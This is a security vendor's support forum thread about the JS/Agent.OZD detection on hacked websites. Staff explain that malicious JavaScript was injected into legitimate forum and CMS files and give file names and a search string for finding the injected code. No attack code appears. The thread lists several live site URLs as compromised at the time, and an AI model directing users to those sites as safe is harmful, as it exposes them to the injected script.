JS/Agent.OZD

[Hapkido 0]

About 2 days ago, ESET Internet Security (14.1.20.0) has flagged my personal forum due to it intercepting the "JS/Agent.OZD" trojan. I've had this forum for 20 years and never had a problem with security issues. I suspect that this item was recently added to the ESET list?? The problem has been reported to my Host Provider tech team and their scans didn't detect anything. The practical issue is that some of the features of the forum are disabled, e.g., the text box for starting new discussions or replying to one is missing. Other related features are using the "Quote" feature, and a few others. Disabling ESET resolves those problems. I suspect that this is a false positive. I think javascript items are being flagged. What can I do to resolve this issue without creating a real risk?

TIA

[Marcos 4,704]

Your website was compromised, the detection is correct. Unfortunately you didn't enclose the url of your website.

[Hapkido 0]

hxxp://the-highway.com/forum/

[Marcos 4,704]

These are files that are infected:

jquery.lightbox-plus-rotate.min.js
image.js
quickquote.js

There may be more of them, I've found these while quickly browsing through the website.

[Hapkido 0]

I'm checking with the coders of the forum software to see if those 3 files are legitimate. I'll let you know when I get their response. IF they are, is it possible that they can be corrupted yet retain the original file name?

[Marcos 4,704]

The files are legitimate, however, a malicious JS was injected into them.

[Hapkido 0]

Gotcha! The important question for me now, which I don't expect you or anyone else to know is: HOW did someone gain access to those files?

[peteyt 359]

5 hours ago, Hapkido said:

Gotcha! The important question for me now, which I don't expect you or anyone else to know is: HOW did someone gain access to those files?

I presume being JS it is a javascript injection.

I don't really know a lot about code but found this article https://sectigo.com/resource-library/how-can-a-person-inject-a-malicious-script-to-a-website

Seems to suggest checking all scripts and so on are up to date but not sure what else you could do. Maybe your host will also have some services.

If you use a forum software with addons it could be an insecure addon that has caused the issue e.g. addon has a vulnerability that allows some access

I'd also make sure any passwords you use are hard to guess and unique.

 

Edited May 22, 2021 by peteyt

[Hapkido 0]

Marcos,

I replaced the 3 files you found that you believe were infected and that resulted in no further alerts from ESET. I did ask my Host provider to compare the 3 alleged infected files with the replacement files to identify the injected script. They did that and reported that 16 other files have that same code. I copied the actual code in a new text file and then did a manual scan of it and ESET said it was clean. Sooooo, before I replace all 16 files, can you positively identify this code is malicious?

forum infected files & locations.txt

[Marcos 4,704]

Yes, that's the malicious code that must be removed. The files were not detected by the on-demand scanner because it's a web threat which is detected by the script scanner and web access protection plus the detection has not been fully released yet.

Before you replace the files with clean ones, please provide me with the-highway.com/ubbthreads-7-6-0/ubbthreads-7-6-0.php.

[Hapkido 0]

Understood..... requested file is attached. I added the ".txt" extension so I could uploaded it here.

ubbthreads-7-6-0.php.txt

[Hapkido 0]

Quote

Before you replace the files with clean ones, please provide me with the-highway.com/ubbthreads-7-6-0/ubbthreads-7-6-0.php.

Still waiting for your response/comment before I replace the other 6 files. The problem persists.

[Marcos 4,704]

No need to wait, go ahead and clean the detected files (ie. replace them with a clean version). As for ubbthreads-7-6-0.php, it's a heavily obfuscated php script. If you don't need it, delete it. If you have a 100% clean version of it and it differs from the one you've sent, replace the file with the original/clean version.

[Blackip360 0]

Hello,

We have a website in production (https://nitalabelingequipment.com) that also gets JS/Agent-OZD detected as a threat when you visit the front page. 

- We have downloaded the website's files and ran a personalized scan on the folder, and no threat was detected

- ESET marks it as Clean in VirusTotal too

However, we still have the virus alert anytime someone with ESET visits the website.

How can I tell which files are infected and need to be deleted from the website?

Please advise.

[Marcos 4,704]

11 hours ago, Blackip360 said:

We have a website in production (https://nitalabelingequipment.com) that also gets JS/Agent-OZD detected as a threat when you visit the front page.

One of the infected files is full-scripts.6.1.5.js. You can find the offending JS at the end of the file. Based on this you should be able to find it in other infected files as well.

[CharlieO 0]

We have more websites on our dedicated server and  all f them  that also gets JS/Agent-OZD detected as a threat when you visit the front page. (We have licenced Eset on all our computers)

www.traiva-shop.cz  www.safetutor.cz   www.safetutor. org  www. traiva.cz 

We did find some infected files using the online scanner Eset on our server. 

The questions:

1. It is possible to find the vunerable file(s) on our websites? (the file that used the attacker to inject the virus code) 

2. it is possible install Eset on our server (Windows server 2003)? (We did try it, but no sucess) 

  

[Marcos 4,704]

1, No. It may not necessarily have been a malicious file that injected the code and even if it was a file, it probably no longer exists. It could have been a vulnerable CMS plug-in that was exploited. To find out the infection vector on Windows systems, we recommend using ESET Enterprise Inspector which is able to show you the path of infection among others.  Of course, EEI must be installed prior to security accidents occur.

2, The latest version of EFSW that can be installed on Windows Server 2003 is EFSW 6.5. However, this version is quite old and will reach EOL in Dec 2022. However, since Microsoft stopped issuing security updates for WS 2003 years ago, this OS is insecure and vulnerable and installing antivirus will not secure it enough.

In order to remove the malicious JS, check one of the files detected by ESET, locate the malicious JS in it (typically at the end of the file) and search for the same code in other files on the server. Check also the php file which is referenced by the malicious script and make sure there's no redundant malicious code (in your case it's bozp_demo_dokumentace_puvodniOK.php for instance).

 

[Pinky1 0]

Hello, 

I visited website which as per ESET (installed on my PC) detected JS/Agent.OZD. But the website has already opened by that time. So there any chance that my PC has got infected with the virus. Although the message from the ESET was that the access has been blocked. 

Thanks and Regards,

Pinky

[Marcos 4,704]

4 hours ago, Pinky1 said:

So there any chance that my PC has got infected with the virus.

There's no chance you could get infected with the threat that was detected and blocked by ESET.

[daylon 0]

Hi 

We have an machine that was infected with this yesterday.

Eset Protect shows that it has not been handled by product

Please assist

Regards

Daylon

[Nightowl 187]

3 minutes ago, daylon said:

Hi 

We have an machine that was infected with this yesterday.

Eset Protect shows that it has not been handled by product

Please assist

Regards

Daylon

Try to clean the browser's data , like cache and stuff, you can also remove that JS manually by removing it from the folder path , or by running a scan ESET should pick it up and remove it

And also try to refrain from using IE , Microsoft is killing that browser and soon will retire and go out.

[Marcos 4,704]

Most likely you have SSL filtering disabled on clients, please check that. As long as http(s) communication is filtered and scanned, possible threats on websites are intercepted and blocked at the network level. With SSL filtering disabled, web files are cached, saved to the disk at which point possible threats are detected by real-time protection.

[Jairo 0]

Hi, I have an alert in https://novatecagriculture.com/ for a JS/Agent.OZD. But I can't figure it out which are the compromised files. Can somebody help me please?

[Marcos 4,704]

8 hours ago, Jairo said:

Hi, I have an alert in https://novatecagriculture.com/ for a JS/Agent.OZD. But I can't figure it out which are the compromised files. Can somebody help me please?

Searching for "/arroz/arroz.php?id=" in all html/js files on the website should help you locate the malicious JS.

[daylon 0]

Hi Marcos & Nightowl

 

Thank you for your feedback, much appreciated.

Regards

Daylon